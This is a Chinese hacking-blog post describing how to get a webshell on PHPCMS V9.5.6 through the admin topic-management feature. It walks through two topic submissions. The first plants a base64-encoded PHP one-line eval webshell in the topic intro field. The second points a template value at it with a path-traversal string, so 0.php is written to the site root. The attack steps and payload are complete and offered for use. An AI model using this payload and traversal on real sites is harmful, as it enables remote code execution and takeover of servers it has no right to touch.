记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

PHPCMS后台低权限拿webSHELL

2014-06-28 01:20
前提是需要有管理专题的权限

测试版本

PHPCMS程序版本:Phpcms V9.5.6 Release 20140522

过程

1. 添加专题

专题名称:test

专题横幅:/1.jpg

专题缩略图:/1.jpg

专题导读:<?php file_put_contents('0.php',base64_decode('PD9waHAgQGV2YWwoJF9QT1NUWzVdKTs/Pg==')); ?>

生成静态:是

专题生成目录:test000

专题子分类:test test

其他默认 -> 提交

PHPCMS后台低权限拿SHELL

2. 再次添加专题

专题名称:test1

专题横幅:/1.jpg

专题缩略图:/1.jpg

专题导读:

生成静态:是

专题生成目录:test111

专题子分类:test test

扩展设置

专题模板:value设置为 ../../../../html/special/test000/index

其他默认 -> 提交

PHPCMS后台低权限拿SHELL

 

PHPCMS后台低权限拿SHELL

会在根目录下面生成 0.php 内容为 <?php @eval($_POST[5]);?>

PHPCMS后台低权限拿SHELL

 

PHPCMS后台低权限拿SHELL

 

 

知识来源: www.2cto.com/Article/201406/311804.html

阅读:64917 | 评论:0 | 标签:cms

想收藏或者和大家分享这篇好文章→复制链接地址

“PHPCMS后台低权限拿webSHELL”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云